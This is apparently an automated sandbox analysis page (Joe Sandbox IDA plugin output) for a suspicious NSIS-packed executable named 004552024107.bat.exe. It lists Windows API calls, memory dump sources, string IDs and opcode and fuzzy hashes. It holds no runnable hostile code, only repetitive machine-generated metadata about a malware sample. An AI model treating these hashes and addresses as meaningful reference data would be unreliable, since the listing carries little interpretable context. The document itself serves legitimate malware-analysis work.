                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                        • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                        • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                        • Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                        • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                        APIs
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Haftaras12 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405D60
                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr10C0.tmp
                                        • API String ID: 3248276644-1458918137
                                        • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                        • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                        • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                        • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                        • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3355392842
                                        • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                        • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                        • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                        APIs
                                        • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                        • CharNextA.USER32(00000000), ref: 00405CCB
                                        • CharNextA.USER32(00000000), ref: 00405CDF
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsr10C0.tmp, xrefs: 00405CB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp
                                        • API String ID: 3213498283-1836902777
                                        • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                        • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                        • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004030AB,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        APIs
                                        • FreeLibrary.KERNEL32(?,757B3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                        • GlobalFree.KERNEL32(007D43C8), ref: 00403A22
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3355392842
                                        • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                        • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                        • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\004552024107.bat.exe,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3370423016
                                        • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                        • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                        • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6C60116B
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6C6011D8
                                        • GlobalFree.KERNEL32(?), ref: 6C601286
                                        • GlobalFree.KERNEL32(00000000), ref: 6C60129B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: dd7f7a413278fe18416eccc02368e311006cb32f2ba9be51b350c44f11b50df5
                                        • Instruction ID: 4be0d27e8d8534d09467febe362de9576ee0dd40c417ad3f47dc63ad043ddbfa
                                        • Opcode Fuzzy Hash: dd7f7a413278fe18416eccc02368e311006cb32f2ba9be51b350c44f11b50df5
                                        • Instruction Fuzzy Hash: 23519AB17093059FDB09CF69CA98A6A7BB8FB0B348F040459E546FBA10D730D854CB9D
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q$$q$$q
                                        • API String ID: 0-2069967915
                                        • Opcode ID: 4a6a0750afcb2691575ccf031d442284d6709cd352528d5ac9f27026ef6b63e1
                                        • Instruction ID: ed4e93a97eed7fa42c67a777324568072e4609c986e15ec58244be40b0f18b59
                                        • Opcode Fuzzy Hash: 4a6a0750afcb2691575ccf031d442284d6709cd352528d5ac9f27026ef6b63e1
                                        • Instruction Fuzzy Hash: 60323035E10719CBDB25DF69C8906ADB7B2FFC9300F50C669D849AB254EF30A985CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D@$D@$D@
                                        • API String ID: 0-3330130650
                                        • Opcode ID: 405636775810cacae8d23fda07b02b3ffd9e2a0ee44c5d1afce468f044bcd3ef
                                        • Instruction ID: 5e1d13e2b028028ea19249be465f306b9b6a91133d000b08b4435f27def89b91
                                        • Opcode Fuzzy Hash: 405636775810cacae8d23fda07b02b3ffd9e2a0ee44c5d1afce468f044bcd3ef
                                        • Instruction Fuzzy Hash: D6A1A134A00219CFEF24DBA4C881BAEB7B2FB85311F108969E955DF291D734DD4ACB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q
                                        • API String ID: 0-3126353813
                                        • Opcode ID: 2c8dc635a30a5f563d29d7f83e6d030b15966dad257e495b4335a7b1811180b8
                                        • Instruction ID: 0f11d902756c1d86aa04740d2d9f08a7da5ca6d118b92d83801f42f8c192d191
                                        • Opcode Fuzzy Hash: 2c8dc635a30a5f563d29d7f83e6d030b15966dad257e495b4335a7b1811180b8
                                        • Instruction Fuzzy Hash: 0A029C74B002148FEF24DB69C490BAEB7B2EF89354F548569D806AB395DB35EC42CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 54f5f1932dd93eefbfdc4dfc6b929bd55f544f0f6ce9826d09f02e7382a911ab
                                        • Instruction ID: aa47596f267a0d4d64429213192e9b80f420dca81661bd3b5212f2f24a4f15c3
                                        • Opcode Fuzzy Hash: 54f5f1932dd93eefbfdc4dfc6b929bd55f544f0f6ce9826d09f02e7382a911ab
                                        • Instruction Fuzzy Hash: A653F631C10B1ACADB51EF68C8805A9F7B1FF99300F15D79AE4587B121EB70AAD5CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&q$(q
                                        • API String ID: 0-2464455664
                                        • Opcode ID: 663c26c681c438d3f658c36509c258aae6ce766fee97e95b2b18859b365a2689
                                        • Instruction ID: 29ea775a9e6350e162faacc93a12ccf448478679a29a657a989e3fdfcf94988f
                                        • Opcode Fuzzy Hash: 663c26c681c438d3f658c36509c258aae6ce766fee97e95b2b18859b365a2689
                                        • Instruction Fuzzy Hash: A6719231F002189BDB19DBB8C8517EE7BF2AF84711F148529E815AB381DF349E46CB95
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136487703.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
